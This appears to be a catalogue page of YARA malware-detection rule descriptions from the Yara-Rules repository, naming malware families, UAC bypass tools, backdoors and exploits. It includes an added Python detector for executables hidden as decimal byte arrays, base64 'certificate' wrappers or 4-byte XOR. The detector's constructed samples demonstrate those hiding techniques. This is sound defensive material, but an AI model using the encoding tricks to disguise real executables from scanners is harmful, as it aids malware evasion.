Kaspersky APT Report - Duqu2 Sample - Generic Rule

aptcommunity
Yara-Rules source

Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe

community
Yara-Rules source

Detects a malware

communitymalware_putterpanda
Yara-Rules source

Detects Malware related to PutterPanda

communitymalware_putterpanda
Yara-Rules source

Detects Malware related to PutterPanda - MSUpdater

communitymalware_putterpanda
Yara-Rules source

Detects Malware related to PutterPanda - MSUpdater

communitymalware_putterpanda
Yara-Rules source

Detects Malware related to PutterPanda - MSUpdater

communitymalware_putterpanda
Yara-Rules source

Detects a malware related to Putter Panda

communitymalware_putterpanda
Yara-Rules source

APT Malware related to PutterPanda Group

aptcommunitymalware_putterpanda
Yara-Rules source

This YARA rule detects APT malware associated with the Putter

aptcommunitymalware_putterpanda
Yara-Rules source

Detects a malware related to Putter Panda

communitymalware_putterpanda
Yara-Rules source

MSUpdater String in Executable

community
Yara-Rules source

The Base64_encoded_Executable rule detects base64-encoded executables, often embedded within files, which

community
Yara-Rules source
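
The entries above for a PE hidden in a comma-separated number list, a base64-encoded executable, the base64 "certificate" drop trick and a 4-byte-XOR-encrypted executable all detect the same thing, an executable behind a thin encoding. The block below is an added example written for this page, not a rule from the Yara-Rules repository: it reimplements those checks in Python so the logic can be run over constructed samples. The minimal MZ/PE image, the XOR key and the sample blobs are all made up here; the "DOS stub" message and the `e_lfanew` field are the real PE header features the checks key on. It goes beyond the catalogue entries in one respect: `base64_alignments` derives the three base64 spellings of a byte pattern, which is how a static YARA string can match a base64 PE regardless of where it starts in the blob.

```python
"""PE files hidden behind simple encodings: detectors for the techniques
named in the entries above (PE as comma-separated decimal bytes, base64
encoded executable incl. the certutil "certificate" wrapper, 4-byte XOR).
Added example, not code from the Yara-Rules repository; every sample input
below is constructed, none is a real file."""
import base64
import re
import struct
from typing import List, Optional

DOS_STUB_MSG = b"This program cannot be run in DOS mode."
MZ_HEADER = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"


def build_sample_pe() -> bytes:
    """Constructed minimal MZ/PE image with only the fields the detectors read."""
    buf = bytearray(0x84)
    buf[0:16] = MZ_HEADER
    buf[0x3C:0x40] = struct.pack("<I", 0x80)              # e_lfanew -> "PE\0\0"
    buf[0x40:0x40 + len(DOS_STUB_MSG)] = DOS_STUB_MSG
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


def is_pe(buf: bytes) -> bool:
    """Structural check: e_lfanew must point at the PE signature, which
    weeds out accidental 'MZ' hits that a bare string match would raise."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_decimal_pe(data: bytes) -> bool:
    """PE written as decimal bytes, e.g. a VBA Array(...) or PowerShell [byte[]]."""
    for m in re.finditer(rb"(?:\d{1,3}\s*,\s*){63,}\d{1,3}", data):
        values = [int(v) for v in re.findall(rb"\d{1,3}", m.group(0))]
        if max(values) < 256 and is_pe(bytes(values)):
            return True
    return False


def find_base64_pe(data: bytes) -> bool:
    """Decode each long base64 run (line breaks allowed, so the
    -----BEGIN CERTIFICATE----- wrapper is covered) and test the result."""
    for m in re.finditer(rb"[A-Za-z0-9+/][A-Za-z0-9+/\r\n]{62,}={0,2}", data):
        blob = re.sub(rb"\s", b"", m.group(0))
        try:
            decoded = base64.b64decode(blob + b"=" * (-len(blob) % 4), validate=True)
        except ValueError:
            continue
        if is_pe(decoded):
            return True
    return False


def base64_alignments(needle: bytes) -> List[bytes]:
    """The three base64 spellings of `needle`, one per byte offset mod 3,
    trimmed of the characters that also depend on neighbouring bytes. This is
    how a static YARA string catches a base64 PE at any offset in a blob."""
    out = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + needle)
        out.append(enc[(0, 2, 3)[k]:4 * ((k + len(needle)) // 3)])
    return out


def find_xor4_pe(data: bytes) -> Optional[bytes]:
    """Executable XOR-ed with a repeating 4-byte key. Known plaintext: the DOS
    stub message XOR the ciphertext must give a key stream of period 4; the
    key is then re-aligned to the MZ offset found by decrypting with it."""
    n = len(DOS_STUB_MSG)
    for off in range(len(data) - n + 1):
        stream = bytes(c ^ p for c, p in zip(data[off:off + n], DOS_STUB_MSG))
        if stream == bytes(n) or any(stream[i] != stream[i % 4] for i in range(n)):
            continue                                      # plaintext, or no 4-byte period
        plain = bytes(b ^ stream[(i - off) % 4] for i, b in enumerate(data))
        for start in range(off, -1, -1):
            if plain[start:start + 2] == b"MZ" and is_pe(plain[start:]):
                return bytes(stream[(start + i - off) % 4] for i in range(4))
    return None


def scan(data: bytes) -> dict:
    """All checks in one pass; base64_alignment is the hit index or -1."""
    return {"decimal_pe": find_decimal_pe(data),
            "base64_pe": find_base64_pe(data),
            "base64_alignment": next((k for k, s in enumerate(base64_alignments(MZ_HEADER))
                                      if s in data), -1),
            "xor4_key": find_xor4_pe(data)}


# Constructed samples, one per hiding technique, plus a benign control.
SAMPLE_PE = build_sample_pe()
XOR_KEY = b"\x4b\x33\xa9\x07"
SAMPLES = {
    "vba_bytes": b"buf = Array(" + b",".join(str(b).encode() for b in SAMPLE_PE) + b")\r\n",
    "cert_trick": (b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(SAMPLE_PE)
                   + b"-----END CERTIFICATE-----\n"),
    "b64_shifted": b"payload=" + base64.b64encode(b"X" + SAMPLE_PE),   # PE at offset 1
    "xor_blob": b"GIF89a" + bytes(b ^ XOR_KEY[i % 4] for i, b in enumerate(SAMPLE_PE)),
    "benign": b"Quarterly report: nothing to see here, 42, 43, 44.\n",
}
```

Run `scan()` over each entry of `SAMPLES` to see the trade-off between the two base64 checks: the decode-and-verify check only fires when the executable starts at a base64 group boundary (it misses `b64_shifted`), while the alignment strings catch the shifted copy but only for the specific MZ header bytes they were derived from. The XOR check uses the DOS stub as known plaintext, so it also recovers the key rather than just flagging the file.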

Detects a Microsoft Office file that contains the AutoOpen macro function

community
Yara-Rules source

Rule to detect DarkEYEv3 encrypted executables (often malware)

community
Yara-Rules source

Identify BlackWorm

community
Yara-Rules source

Detects APT backspace

aptcommunity
Yara-Rules source

Detects Samples related to APT17 activity - file FXSST.DLL

aptcommunity
Yara-Rules source

Custom SSH backdoor based on Python and paramiko - file server.py

backdoorcommunity
Yara-Rules source

Detects exploits for CVE-2015-1674

communityexploit
Yara-Rules source

The 'LightFTP_Config' YARA rule detects configuration files associated with the LightFTP server, which may indicate unauthorized or malicious FTP service setup. SOC teams should

community
Yara-Rules source

Detects a light FTP server

community
Yara-Rules source

UACElevator bypassing UAC - file UACElevator.exe

communityevasion
Yara-Rules source

Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor

backdoorcommunity
Yara-Rules source

Detects Win7Elevate - Windows UAC bypass utility

communityevasion
Yara-Rules source

CVE-2015-1701 compiled exploit code

communityexploit
Yara-Rules source

Malware InstallRex / AntiFW

community
Yara-Rules source

Trojan Buzus / Softpulse

backdoorcommunity
Yara-Rules source

Kraken Bot Sample - file inf.bin

community
Yara-Rules source

Identify Cythosia

community
Yara-Rules source

http://cylance.com/opcleaver

community
Yara-Rules source

Identify Dexter POSGrabber

community
Identify Genome
yara low
Yara-Rules source

Identify Genome

community
Identify Backoff
yara low
Yara-Rules source

Identify Backoff

community
Identify Alina
yara low
Yara-Rules source

Identify Alina

community
Yara-Rules source

Identify Athena HTTP

community
Yara-Rules source

Polish banking malware

community
Yara-Rules source

The YARA rule '

apt, bestia, community
Yara-Rules source

Identify version of Drive DDoS malware using compromised sites

community
Yara-Rules source

Identify Andromeda

community
Yara-Rules source

Match first two bytes, files and string present in iBanking

community
Yara-Rules source

Identify Madness Pro DDoS Malware

community
Yara-Rules source

The 'office_document_vba' rule detects Office documents containing embedded VBA macros,

community
Test rule
yara low
Yara-Rules source

Test rule

community
Shylock Banker
yara low
Yara-Rules source

Shylock Banker

community
Yara-Rules source

fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620

community
Yara-Rules source

Identify first version of drive DDoS malware

community
Yara-Rules source

Identify newer version of drive DDoS malware

community
Yara-Rules source

Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/

community
Yara-Rules source

Citadel 1.5.x.y trojan banker

backdoor, community
Yara-Rules source

ICE-IX 1.2.x.y trojan banker

backdoor, community
Yara-Rules source

SpyEye X.Y memory

community
Yara-Rules source

SpyEye X.Y Plugins memory

community